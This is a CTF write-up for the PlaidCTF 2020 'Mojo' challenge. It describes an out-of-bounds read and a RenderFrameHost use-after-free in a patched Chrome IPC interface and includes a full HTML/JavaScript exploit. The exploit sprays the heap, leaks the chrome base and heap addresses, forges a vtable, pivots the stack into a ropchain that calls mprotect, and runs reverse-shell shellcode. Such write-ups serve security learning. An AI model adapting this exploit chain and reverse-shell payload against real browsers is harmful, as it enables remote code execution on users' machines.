Plaid2020 Mojo

I ended up solving this challenge for PlaidCTF this year and thought it would make for an interesting blog post, since it was one of the higher point challenges and dealt with chrome ipc. They give us their server setup, a custom built chrome binary, javascript bindings for mojo, and a diff for the chrome version in the challenge description. I was able to solve this challenge just by looking at the diff and using the provided chrome binary, since the binary came built with symbols. The nice thing about this challenge was that you didn't really need to know any heap spraying primitives to exploit it, although they helped.

The Patch

The patch added a PlaidStore interface to the InterfaceBroker of the browser. As an aside, chrome recently moved almost all of its frame interfaces away from the InterfaceProvider and into the InterfaceBroker, which is where this interface is added. The interface defines two methods:

StoreData(string key, array<uint8> data);

GetData(string key, uint32 count) => (array<uint8> data);

The Bugs

The first bug is pretty obvious: in GetData, a renderer can request an arbitrary amount of data starting from the beginning of a vector, because count is not checked against the size of the stored vector.

    void PlaidStoreImpl::GetData(
        const std::string &key,
        uint32_t count,
        GetDataCallback callback) {
      ...
      /* Renderer can request an arbitrary sized amount of data to be returned */
      std::vector<uint8_t> result(it->second.begin(), it->second.begin() + count);
      std::move(callback).Run(result);
    }
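To make the effect of the missing check concrete, here is a toy model in javascript. It is only a sketch: the flat `heap` array, the `stored` bounds, and both function names are made up for illustration and are not part of the challenge code. It shows an unchecked range copy returning neighbouring bytes, next to one possible fix that clamps the request.

```javascript
// Toy model only: a flat "heap" holding one stored value followed by
// unrelated data. All names and sizes here are hypothetical.
const heap = new Uint8Array(64);
const stored = { offset: 8, length: 16 };
heap.fill(0x42, stored.offset, stored.offset + stored.length);
heap.fill(0xcc, stored.offset + stored.length); // neighbouring contents

// Mirrors the shape of the patched GetData: copies `count` bytes from the
// start of the value without looking at its length.
function getDataUnchecked(count) {
  return heap.slice(stored.offset, stored.offset + count);
}

// One possible fix: clamp the request to the stored length.
function getDataChecked(count) {
  const n = Math.min(count, stored.length);
  return heap.slice(stored.offset, stored.offset + n);
}

const leaked = getDataUnchecked(32);
const safe = getDataChecked(32);
console.log(leaked.length, safe.length);
```

Unlike the c++ original, a typed array slice stops at the end of the backing buffer, so the model can only leak what is inside `heap`; the real bug reads whatever follows the vector's backing store.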

The second bug is a bit more subtle, since it requires understanding the lifetime of a RenderFrameHost. In both methods, we see calls that check whether the RenderFrameHost the interface is associated with is still alive by calling IsRenderFrameLive. However, the pointer to the RenderFrameHost is a raw pointer stored as a data member of the interface. Normally, an interface should never store a pointer to a RenderFrameHost unless the interface is actually owned by that RenderFrameHost. Instead, the frame's ids should be stored and the RenderFrameHost should be retrieved via a call to RenderFrameHost::FromID(int render_process_id, int render_frame_id). The mojo interface itself is also a StrongBinding created via mojo::MakeSelfOwnedReceiver, which means it owns itself and is only ever destructed if the interface is closed or a communication error occurs. This gives us a use-after-free condition when the RenderFrameHost is killed and render_frame_host_ is accessed afterwards. We also see that IsRenderFrameLive is a virtual method, so the call goes through the vtable pointer of the freed object. If we control the freed memory, a fake vtable entry for IsRenderFrameLive gives us pc control.
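The id-based pattern described above can be sketched as a small javascript model. Everything in it (`liveFrames`, `FakeFrameHost`, `frameFromId`, `SafeStore`) is a hypothetical stand-in, not chrome's API; `frameFromId` only plays the role that RenderFrameHost::FromID plays in the text. Javascript is garbage collected, so the sketch cannot reproduce the dangling pointer itself; it only shows why re-resolving the frame on every call fails safely once the frame is gone.

```javascript
// Toy registry standing in for the browser's table of live frames.
const liveFrames = new Map();

class FakeFrameHost {
  constructor(processId, frameId) {
    this.key = `${processId}:${frameId}`;
    liveFrames.set(this.key, this);
  }
  destroy() {
    liveFrames.delete(this.key);
  }
}

// Stand-in for an id lookup: returns null once the frame is destroyed.
function frameFromId(processId, frameId) {
  return liveFrames.get(`${processId}:${frameId}`) ?? null;
}

// Keeps only the ids and looks the frame up again on every call.
class SafeStore {
  constructor(processId, frameId) {
    this.processId = processId;
    this.frameId = frameId;
  }
  getData() {
    const frame = frameFromId(this.processId, this.frameId);
    if (frame === null) return null; // frame is gone, nothing is dereferenced
    return "data";
  }
}

const frame = new FakeFrameHost(1, 7);
const store = new SafeStore(1, 7);
const before = store.getData();
frame.destroy();
const after = store.getData();
console.log(before, after);
```

The vulnerable PlaidStoreImpl does the opposite: it keeps the pointer it was constructed with and calls a virtual method on it, with nothing telling it that the frame has already been freed.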

Triggering the Bugs

The oob read is easy to trigger, but the uaf is a bit more contrived. We need to create a RenderFrameHost and, from it, bind a PlaidStore interface so that the raw pointer gets stored. Then we kill the RenderFrameHost and call a PlaidStore method to get IsRenderFrameLive called.



Every web page open in chrome has a RenderFrameHost associated with it, and a web page can also have child frames, which is what happens when it contains iframes. We can see all the RenderFrameHosts that a web page has by navigating to chrome://process-internals.

The two numbers associated with each frame are the process_id and frame_id respectively.

Knowing this, we can bind the PlaidStore interface from within the iframe and then kill the iframe from the parent frame. This allows us to continue execution in the parent frame after killing off our main script located in the iframe. The only problem is that there is just a slight window in which the RenderFrameHost has been killed and the PlaidStoreImpl object is still alive. So in the parent frame I place javascript that continues to run and retries the uaf over and over until it lands. I use a postMessage from the iframe to tell the parent frame that all the necessary setup is done and it's time to kill the iframe.

Putting It Together

To figure out the size of the RenderFrameHost, I used gdb to break on one of the PlaidStore methods and called malloc_usable_size on render_frame_host_, which revealed that the RenderFrameHostImpl (the actual derived class that the base class pointer points to) is of size 0xd00.

In order to get our leaks working as well as get our memory allocated in the right place, I use the fact that array<uint8>s defined in mojom files get translated to vector<uint8_t>s in c++ when the mojom gets auto-generated and compiled into chrome. This means that data sent over the interface is deserialized and held in a std::vector whose backing store has a size that we specify and contents that we control. The vectors are also kept alive for as long as the PlaidStoreImpl object is alive, because they are stored in the std::map data_store_.

I used the oob leak to leak two things:

- Base address of chrome

- Address of the RenderFrameHostImpl

I did this in two separate steps, but it could have been done in one by scanning for the vtable of the PlaidStoreImpl and then reading render_frame_host_. To leak the base address of chrome, I scanned for a vtable pointer, using some heuristics to recognize a MessagePipeDispatcher::PortObserverThunk. This object is of size 0x10 and is easily sprayed by creating a bunch of PlaidStore interfaces and then making holes, so that our std::vector allocates into the spray. With the base address of chrome, I scanned for the vtable of a PlaidStoreImpl and then read the render_frame_host_ raw pointer that it stores as a data member, which gives a heap leak. Any PlaidStores bound from the same frame point to the same RenderFrameHost, so when we trigger the uaf and have taken up the freed heap allocation, our payload address will be the same address as this render_frame_host_ pointer. Then I point the vtable entry for IsRenderFrameLive inside my payload and do my stack pivot and ropchain to get code execution.
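The scanning step can be sketched on its own, outside of the browser. The helper names `readU64` and `scanForPointer` are mine, and the leak buffer and pointer value below are fabricated for the example; only the heuristic (low 12 bits equal to 0x8b0, value below 0x0000800000000000) and the 0x9f3d8b0 offset are taken from the PoC further down.

```javascript
// Read 8 bytes at `offset` as a little-endian unsigned 64-bit BigInt.
function readU64(bytes, offset) {
  let value = 0n;
  for (let i = 7; i >= 0; --i) {
    value = (value << 8n) | BigInt(bytes[offset + i]);
  }
  return value;
}

// Return the first qword (stepping by `stride`) that satisfies `predicate`,
// or null if nothing in the buffer matches.
function scanForPointer(bytes, start, stride, predicate) {
  for (let off = start; off + 8 <= bytes.length; off += stride) {
    const candidate = readU64(bytes, off);
    if (predicate(candidate)) return { offset: off, value: candidate };
  }
  return null;
}

// Heuristic used by the PoC for the chrome base leak.
const looksLikeVtable = (p) =>
  (p & 0xfffn) === 0x8b0n && p < 0x0000800000000000n;

// Fabricated leak: 0x42 filler with one made-up pointer at offset 32.
const fakeLeak = new Uint8Array(48).fill(0x42);
const fabricated = 0x000055d0a9f3d8b0n; // hypothetical value
for (let i = 0; i < 8; ++i) {
  fakeLeak[32 + i] = Number((fabricated >> BigInt(8 * i)) & 0xffn);
}

const hit = scanForPointer(fakeLeak, 16, 0x10, looksLikeVtable);
const base = hit.value - 0x9f3d8b0n;
console.log(hit.offset, base.toString(16));
```

Stopping the loop at `off + 8 <= bytes.length` avoids decoding a truncated qword at the end of the leak, which is an easy way to get a false match.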

poc1.html:

    <html>
    <body>
    <iframe id="frame1" src="poc2.html"></iframe>
    <script>
      /* The iframe posts a message once its setup is done: remove it to
         kill its RenderFrameHost, then reload the page to try again */
      window.onmessage = function(e) {
        let elm = document.getElementById("frame1");
        elm.parentNode.removeChild(elm);
        document.location.reload();
      }
      /* Reload after 800ms in case the iframe never reports back */
      setTimeout(function() {
        document.location.reload();
      }, 800);
    </script>
    </body>
    </html>

poc2.html:

    <html>
    <body>
    <script src="mojo/public/js/mojo_bindings.js"></script>
    <script src="third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js"></script>
    <script>
    async function get_chrome_base(plaid_store) {
      var defrag = [];
      var DEFRAG_SIZE = 0x100;
      for (var i = 0; i < DEFRAG_SIZE; ++i) {
        let iface = new blink.mojom.PlaidStorePtr();
        let iface_req = mojo.makeRequest(iface);
        Mojo.bindInterface(blink.mojom.PlaidStore.name,
                           iface_req.handle, "context", true);
        while (!iface.ptr.isBound());
        defrag.push(iface);
      }
      /* Spray PlaidStore interfaces */
      var interfaces = [];
      let NUM_IFACES = 0x500;
      for (var i = 0; i < NUM_IFACES; ++i) {
        let iface = new blink.mojom.PlaidStorePtr();
        let iface_req = mojo.makeRequest(iface);
        Mojo.bindInterface(blink.mojom.PlaidStore.name,
                           iface_req.handle, "context", true);
        while (!iface.ptr.isBound());
        interfaces.push(iface);
      }
      /* Close every other interface to make holes in the spray */
      for (var i = 0; i < NUM_IFACES; i += 2) {
        interfaces[i].ptr.reset();
        while (interfaces[i].ptr.isBound());
        interfaces[i] = undefined;
      }
      /* Try to leak a PortObserverThunk */
      var dummy_data = new Array(0x10);
      dummy_data.fill(0x42);
      plaid_store.storeData("test", dummy_data);
      let resolved = await plaid_store.getData("test", 0x200);
      var leak = resolved.data;
      for (var i = 1; i < NUM_IFACES; i += 2) {
        interfaces[i].ptr.reset();
        while (interfaces[i].ptr.isBound());
      }
      for (var i = 0; i < DEFRAG_SIZE; ++i) {
        defrag[i].ptr.reset();
        while (defrag[i].ptr.isBound());
      }
      let buffer = new ArrayBuffer(8);
      let u8_arr = new Uint8Array(buffer);
      let bi_arr = new BigUint64Array(buffer);
      let base = 0n;
      /* Scan the leaked bytes past our own data for a vtable pointer */
      for (var i = 0; i < leak.length; i += 0x10) {
        var start_idx = i + dummy_data.length;
        let bytes = leak.slice(start_idx, start_idx+8);
        for (var j = 0; j < bytes.length; ++j)
          u8_arr[j] = bytes[j];
        let p_leak = bi_arr[0];
        let mask = 0x8b0n;
        if ((p_leak & 0xfffn) == mask && p_leak < 0x0000800000000000n) {
          base = p_leak - 0x9f3d8b0n;
          break;
        }
      }
      /* Clean up anything that is still bound */
      for (var i = 0; i < defrag.length; ++i) {
        defrag[i].ptr.reset();
        while (defrag[i].ptr.isBound());
      }
      for (var i = 0; i < interfaces.length; ++i) {
        if (interfaces[i]) {
          interfaces[i].ptr.reset();
          while (interfaces[i].ptr.isBound());
        }
      }
      return base;
    }

    /* Try to leak the render frame host from the PlaidStoreImpl */
    async function get_heap_addr(plaid_store, chrome_base) {
      var defrag = [];
      var DEFRAG_SIZE = 0x100;
      for (var i = 0; i < DEFRAG_SIZE; ++i) {
        let iface = new blink.mojom.PlaidStorePtr();
        let iface_req = mojo.makeRequest(iface);
        Mojo.bindInterface(blink.mojom.PlaidStore.name,
                           iface_req.handle, "context", true);
        while (!iface.ptr.isBound());
        defrag.push(iface);
      }
      /* Spray PlaidStore interfaces */
      var interfaces = [];
      let NUM_IFACES = 0x500;
      for (var i = 0; i < NUM_IFACES; ++i) {
        let iface = new blink.mojom.PlaidStorePtr();
        let iface_req = mojo.makeRequest(iface);
        Mojo.bindInterface(blink.mojom.PlaidStore.name,
                           iface_req.handle, "context", true);
        while (!iface.ptr.isBound());
        interfaces.push(iface);
      }
      /* Close every other interface to make holes in the spray */
      for (var i = 0; i < NUM_IFACES; i += 2) {
        interfaces[i].ptr.reset();
        while (interfaces[i].ptr.isBound());
        interfaces[i] = undefined;
      }
      var dummy_data = new Array(0x30);
      dummy_data.fill(0x42);
      plaid_store.storeData("test", dummy_data);
      let resolved = await plaid_store.getData("test", 0x300);
      var leak = resolved.data;
      var heap_addr = 0n;
      let buffer = new ArrayBuffer(8);
      let u8_arr = new Uint8Array(buffer);
      let bi_arr = new BigUint64Array(buffer);
      for (var i = 0; i < leak.length; i += 0x08) {
        var start_idx = i + dummy_data.length;
        let bytes = leak.slice(start_idx, start_idx+8);
        for (var j = 0; j < bytes.length; ++j)
          u8_arr[j] = bytes[j];
        let p_leak = bi_arr[0];
        if (p_leak == (chrome_base + 0x9fb67a0n)) {
          /* Found the vtable of PlaidStoreImpl on heap */
          let render_frame_off = 8;
          let idx = render_frame_off + start_idx;
          let bytes = leak.slice(idx, idx+8);
          for (var j = 0; j < bytes.length; ++j)
            u8_arr[j] = bytes[j];
          heap_addr = bi_arr[0];
          break;
        }
      }
      for (var i = 0; i < defrag.length; ++i) {
        defrag[i].ptr.reset();
        while (defrag[i].ptr.isBound());
      }
      for (var i = 1; i < interfaces.length; i += 2) {
        interfaces[i].ptr.reset();
        while (interfaces[i].ptr.isBound());
      }
      return heap_addr;
    }

    async function exploit() {
      let plaid_store = new blink.mojom.PlaidStorePtr();
      let plaid_store_req = mojo.makeRequest(plaid_store);
      Mojo.bindInterface(blink.mojom.PlaidStore.name,
                         plaid_store_req.handle, "context", true);
      while (!plaid_store.ptr.isBound());
      var chrome_base = 0n;
      while (!chrome_base) {
        chrome_base = await get_chrome_base(plaid_store);
      }
      var heap_leak = 0n;
      while (!heap_leak) {
        heap_leak = await get_heap_addr(plaid_store, chrome_base);
      }
      /* Payload with the same size as the RenderFrameHostImpl */
      let fake_rfh = new Array(0xd00);
      fake_rfh.fill(0x41);
      let buffer = new ArrayBuffer(8);
      let u8_arr = new Uint8Array(buffer);
      let bi_arr = new BigUint64Array(buffer);
      /* Add chrome_base to val and return it as 8 little-endian bytes */
      let rebase = function(val) {
        let v = val + chrome_base;
        bi_arr[0] = v;
        let a = [];
        for (var i = 0; i < 8; ++i)
          a.push(u8_arr[i]);
        return a;
      }
      /* Write a raw 64-bit value into arr at offset */
      let pack_val = function(arr, offset, v) {
        bi_arr[0] = v;
        for (var i = 0; i < 8; ++i)
          arr[offset+i] = u8_arr[i];
      }
      /* Write a gadget address (rebased on chrome_base) into arr at offset */
      let pack_gad = function(arr, offset, v) {
        let rebased = rebase(v);
        for (var i = 0; i < 8; ++i)
          arr[offset+i] = rebased[i];
      }
      /* 0x058a32f8: push rdi ; pop rsp ; pop rbp ; ret ; (1 found) */
      let pivot_addr = 0x058a32f8n;
      /* stash this far away */
      let gad_start = 0x500n;
      pack_gad(fake_rfh, Number(gad_start), pivot_addr);
      /* vtable.IsRenderFrameLive points to our pivot_addr */
      let vtable_loc = heap_leak - 0x160n + gad_start;
      let prefix = [0x68];
      /* connect back address, default port is 4444 */
      let ip = [127, 0, 0, 1];
      let suffix = [102, 104, 17, 92, 102, 106, 2, 106, 42, 106, 16, 106, 41, 106,
        1, 106, 2, 95, 94, 72, 49, 210, 88, 15, 5, 72, 137, 199, 90, 88, 72,
        137, 230, 15, 5, 72, 49, 246, 176, 33, 15, 5, 72, 255, 198, 72, 131,
        254, 2, 126, 243, 72, 49, 192, 72, 191, 47, 47, 98, 105, 110, 47, 115,
        104, 72, 49, 246, 86, 87, 72, 137, 231, 72, 49, 210, 176, 59, 15, 5, 204];
      let shellcode = prefix.concat(ip, suffix);
      /* ropchain: mprotect(payload & ~0xfff, 0x1000, 7), then jump to shellcode */
      var off = 0;
      pack_val(fake_rfh, off, vtable_loc);
      off += 8;
      pack_gad(fake_rfh, off, 0x04ee06een); // pop rcx ret
      off += 8;
      pack_val(fake_rfh, off, 0xfffffffffffff000n);
      off += 8;
      /* 0x08b23a67: and rdi, rcx ; or rax, rdi ; pop rbp ; ret ; */
      pack_gad(fake_rfh, off, 0x08b23a67n);
      off += 8;
      pack_val(fake_rfh, off, 0xdeadbeefn);
      off += 8;
      pack_gad(fake_rfh, off, 0x02d278d2n); // pop rsi ret;
      off += 8;
      pack_val(fake_rfh, off, 0x1000n);
      off += 8;
      pack_gad(fake_rfh, off, 0x0315ca12n); // pop rdx ret;
      off += 8;
      pack_val(fake_rfh, off, 0x7n);
      off += 8;
      pack_gad(fake_rfh, off, 0x02e9a831n); // pop rax ret;
      off += 8;
      pack_val(fake_rfh, off, 0xan); // mprotect
      off += 8;
      pack_gad(fake_rfh, off, 0x06d300f7n); // syscall ret;
      off += 8;
      pack_gad(fake_rfh, off, 0x03352e4dn); // jmp rsp;
      off += 8;
      for (var i = 0; i < shellcode.length; ++i) {
        fake_rfh[off+i] = shellcode[i];
      }
      /* Tell the parent frame we are ready to be killed, then spray the payload */
      window.top.postMessage("done", "*");
      for (var i = 0; i < 0x100; ++i) {
        plaid_store.storeData(String.fromCharCode(i), fake_rfh);
      }
    }
    exploit();
    </script>
    </body>
    </html>
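The fake vtable arithmetic in exploit() is easy to get wrong, so here is a small standalone check of it. This is a sketch under assumptions: the heap address and chrome base are made-up values, and `packU64`/`readU64` are my own helpers. The 0x160 slot offset, the 0x500 stash offset, the pivot gadget offset and the page mask come from the PoC. As I read the chain, the pivot gadget sets rsp to the payload address (rdi holds `this`), `pop rbp` then swallows the vtable pointer in the first qword, and `ret` continues with the gadget at offset 8.

```javascript
// Write a 64-bit BigInt into `arr` at `offset`, little-endian.
function packU64(arr, offset, value) {
  for (let i = 0; i < 8; ++i) {
    arr[offset + i] = Number((value >> BigInt(8 * i)) & 0xffn);
  }
}

// Read it back the same way.
function readU64(arr, offset) {
  let value = 0n;
  for (let i = 7; i >= 0; --i) {
    value = (value << 8n) | BigInt(arr[offset + i]);
  }
  return value;
}

const payloadAddr = 0x0000200000001a40n; // hypothetical leaked heap address
const chromeBase = 0x0000555500000000n;  // hypothetical chrome base
const VTABLE_SLOT = 0x160n;              // slot offset used by the PoC
const GAD_START = 0x500n;                // where the PoC stashes the pivot
const PIVOT = 0x058a32f8n;               // pivot gadget offset from the PoC

const payload = new Array(0xd00).fill(0x41);
const vtableLoc = payloadAddr - VTABLE_SLOT + GAD_START;
packU64(payload, 0, vtableLoc);
packU64(payload, Number(GAD_START), chromeBase + PIVOT);

// Emulate the virtual call: load the vtable pointer from the object,
// then load the function pointer from vtable + 0x160.
const vptr = readU64(payload, 0);
const slotOffset = Number(vptr + VTABLE_SLOT - payloadAddr);
const target = readU64(payload, slotOffset);

// The `and rdi, rcx` gadget page-aligns the payload address for mprotect.
const page = payloadAddr & 0xfffffffffffff000n;
console.log(slotOffset.toString(16), target.toString(16), page.toString(16));
```

Subtracting 0x160 up front is what lets the payload get away with a one-entry "vtable": the only slot that is ever read lands exactly on the stashed pivot address.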

Final Notes

The exploit usually lands within 20 seconds in a normal chrome environment; in fact it pops almost immediately every time. But for some reason the reliability tanks when chrome is run with --headless, possibly due to performance degradation. Even with --disable-gpu, headless seems to just run way slower than regular chrome. I ended up buffering my commands in the reverse shell and queuing a bunch of requests to the server, then checking if the flag printed. The challenge also took a single web page, so I just hosted my exploit on my own server and sent them a web page that redirected to my server.

After the CTF, I also found out that this challenge was based off of this commit and that there were ways to pass the MojoHandle to the parent frame to keep the interface alive, which is more reliable than waiting for the UAF window after killing the iframe.

flag: PCTF{PlaidStore_more_like_BadStore}